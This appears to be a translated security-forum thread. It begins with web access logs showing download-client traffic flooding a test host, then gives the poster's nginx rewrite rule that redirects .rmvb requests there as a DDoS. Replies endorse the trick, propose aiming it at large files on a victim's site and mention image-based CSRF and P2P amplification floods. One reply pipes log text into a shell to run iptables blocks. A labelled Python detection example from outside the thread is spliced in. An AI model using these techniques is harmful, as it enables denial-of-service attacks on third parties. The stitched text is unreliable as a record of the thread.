180.157.86.134 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

113.89.97.65 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

61.171.115.42 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

118.213.174.214 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"

113.89.97.65 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

58.19.214.162 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"

113.89.97.65 - - [24/May/2013:22:08:30 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

120.33.63.134 - - [24/May/2013:22:08:31 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

180.108.186.183 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

183.156.53.206 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

218.11.176.18 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"

58.209.237.174 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

58.212.102.13 - - [24/May/2013:22:08:35 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

218.31.5.235 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718)"

58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

183.25.17.231 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

183.156.53.206 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

222.75.204.224 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"

61.171.115.42 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

112.102.189.170 - - [24/May/2013:22:08:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

183.156.53.206 - - [24/May/2013:22:08:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"

8#

imlonghao (imlonghao.com link exchange) | 2013-05-24 22:10

The rule at this point is as follows.

# Redirect every request for a .rmvb file to the test host
location ~* \.(rmvb)$ {
    rewrite ^/ http://test.wooyun.imlonghao.com/?xl;
}

9#

/fd (/proc) ?() | 2013-05-24 22:10

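Awesome

10#

xsser (Ten phalluses, some long, some short!!) | 2013-05-24 22:14

Damn... that's quite a lot of traffic

11#

leaf | 2013-05-24 22:20

Nice idea!

12#

docall (Young Master Chen, that's me...) | 2013-05-24 22:22

Going down! Jianxin, hurry up and get Whisper to sponsor you!

13#

斯文的鸡蛋 (Pics come with jb... but jb doesn't necessarily come with the truth) | 2013-05-24 22:33

That's damn dirty

14#

L.N. (Zhang Fei + Cao Cao) | 2013-05-24 22:52

Truly dirty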

15#

Mujj (Looking for someone who pentests websites to teach me pentesting; I'll give them an 8-digit QQ number and a couple's pair) | 2013-05-24 23:02

cat wooyun.org.log | grep '符合规则的' | awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}'| sort -n | uniq | sh
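Added example (not part of the thread, and not any commenter's code): a Python version of the log-filtering step in the comment above, run over constructed log lines. It flags a URI requested by many distinct addresses with mostly 206/416 responses, and returns validated iptables commands as strings for review instead of piping them to a shell; the thresholds, function names and sample data are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample in nginx "combined" log format; addresses are from the
# RFC 5737 documentation ranges and the referrer is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 608 "http://referrer.example" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
198.51.100.7 - - [24/May/2013:22:06:56 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
203.0.113.5 - - [24/May/2013:22:06:58 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0"
192.0.2.10 - - [24/May/2013:22:06:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://referrer.example" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
198.51.100.99 - - [24/May/2013:22:07:00 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
203.0.113.77 - - [24/May/2013:22:07:01 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
this line is not a log entry
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
RANGE_STATUSES = {"206", "416"}  # Partial Content / Range Not Satisfiable


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def flood_signatures(entries, min_ips=3, min_range_ratio=0.8):
    """Return {uri: stats} for URIs requested by many distinct clients where
    most responses are range-related (206/416), as download clients produce."""
    by_uri = defaultdict(list)
    for e in entries:
        by_uri[e["uri"]].append(e)
    flagged = {}
    for uri, hits in by_uri.items():
        ips = {h["ip"] for h in hits}
        ratio = sum(h["status"] in RANGE_STATUSES for h in hits) / len(hits)
        if len(ips) >= min_ips and ratio >= min_range_ratio:
            bare_ua = sum("(" not in h["ua"] for h in hits)  # e.g. "Mozilla/5.0"
            flagged[uri] = {"hits": len(hits), "ips": ips,
                            "range_ratio": ratio, "bare_ua": bare_ua}
    return flagged


def block_rules(candidates):
    """Build iptables commands as strings for review. Each candidate must parse
    as an IPv4 address, so no log-derived text reaches a shell unchecked."""
    valid = set()
    for raw in candidates:
        try:
            addr = ipaddress.ip_address(raw)
        except ValueError:
            continue
        if addr.version == 4:
            valid.add(addr)
    return [f"iptables -I INPUT -p tcp --dport 80 -s {a} -j DROP" for a in sorted(valid)]


if __name__ == "__main__":
    for uri, s in flood_signatures(parse(SAMPLE_LOG.splitlines())).items():
        print(uri, s["hits"], "hits from", len(s["ips"]), "addresses")
        print("\n".join(block_rules(s["ips"])))
```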

16#

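x0ers (What exactly did the first person to learn that milk is drinkable do to the cow?) | 2013-05-24 23:02

Great idea. Bump

17#

LittlePig (</html>) | 2013-05-25 00:13

This one can be filed under sneaky tricks now…

18#

livers (Like a dream, like an illusion) | 2013-05-25 11:41

@imlonghao You take 800 damage yourself, though

19#

虚云 | 2013-05-25 12:09

Can you afford the rewrite? If you want to kill someone else, you first need plenty of HP yourself.

@livers

Spot on!

20#

虚云 | 2013-05-25 12:10

Still, the idea really does deserve praise. If someone put a popular blockbuster on some hosting space that allows uploads and publishes the address, the consequences would be unthinkable.

21#

z7y (I'm z7y, and I speak for the little fatty!!) | 2013-05-25 12:31

Super cool....  File it under sneaky tricks~ @xsser

22#

insight-labs (Root Yourself in Success) | 2013-05-25 12:42

@虚云 If you can find a link on the other side's website that consumes resources or bandwidth, such as a large file, rewriting to it costs very little

23#

imlonghao (imlonghao.com link exchange) | 2013-05-25 13:00

@虚云 @livers

From what I've observed, if it's only a rewrite, it doesn't hurt my side much...

As @insight-labs said, if the other side has a very large file, you can simply rewrite to it.

Note that the clients making these requests will actually download it..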

24#

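核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares to stand in the way!) | 2013-05-25 14:36

Speaking of traffic-forwarding attacks, there's actually a simpler and more efficient one: just go into a high-traffic thread on Baidu Tieba:

See: [CSRF] Image-based (<img) DDoS, CC, session hijacking and probing user information, you know what I mean...

25#

萧然 (I like all beautiful things·) | 2013-05-25 14:41

@核攻击 Wow, this works too? I once used this kind of thing to inflate the numbers for a China Mobile promotion, took first place and won a phone

26#

imlonghao (imlonghao.com link exchange) | 2013-05-25 14:48

@核攻击 If this could take over the front page of D8....

27#

核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares to stand in the way!) | 2013-05-25 14:49

Speaking of attacks using cloud resources, some years ago someone launched a massive pure-bandwidth attack by posing as a popular P2P resource...

28#

imlonghao (imlonghao.com link exchange) | 2013-05-25 14:57

@核攻击 Is there a link I can look at?

29#

核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares to stand in the way!) | 2013-05-25 15:07

@imlonghao Using P2P networks to launch large-scale, high-volume DDoS attacks

30#

核攻击 (Rule the globe, enslave all of humanity! Destroy any organic life form that dares to stand in the way!) | 2013-05-25 15:18

@萧然 See: [CSRF] Image-based (<img) DDoS, CC, session hijacking and probing user information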

31#

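CHForce (Trojan handler) | 2013-05-25 15:58

Each reply is more impressive than the last; the moves keep getting sharper

32#

happytree ("If I die, please eat me") | 2013-05-25 16:02

Yamete~ too scary

33#

廷廷 (Ideas matter most) | 2013-05-25 16:16

@核攻击 Definitely learning this!!!

34#

小森森 | 2013-05-25 17:44

Thumbs up~~ But... your own site will get really laggy too~

35#

imlonghao (imlonghao.com link exchange) | 2013-05-25 18:08

@小森森 http://imlonghao.com is still in this situation right now, but does it feel laggy to you?

36#

Mujj (Looking for someone who pentests websites to teach me pentesting; I'll give them an 8-digit QQ number and a couple's pair) | 2013-05-25 18:52

@imlonghao Rewriting consumes CPU resources, but it doesn't use much.

37#

whking | 2013-05-25 19:56

@imlonghao Your site went down a few days ago; I thought you had shut it down.

38#

imlonghao (imlonghao.com link exchange) | 2013-05-25 20:32

@whking -.-##

39#

GaRY | 2013-05-26 00:45

Great post! Definitely featured material. It's not that nobody has thought of DDoS techniques in this area, but none of them reached the stage of a concrete instance. The OP's post counts as the first, AFAIK.

40#

xsser (Ten phalluses, some long, some short!!) | 2013-05-26 11:32

@livers For the poster himself, this should only cost the rewrite, but for the target it may also have to go through the database......

41#

小森森 | 2013-05-26 14:56

@imlonghao Not laggy.. but I can't reach it at all...

42#

蟋蟀哥哥 (popok is a grandson!! [just for fun]) | 2013-05-26 15:51

This is a featured post now

hang | 2013-05-26 20:34

This reminded me of vessial's talk slides from POC2011

Xunlei_Network_Internal_for_PoC2011.pdf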

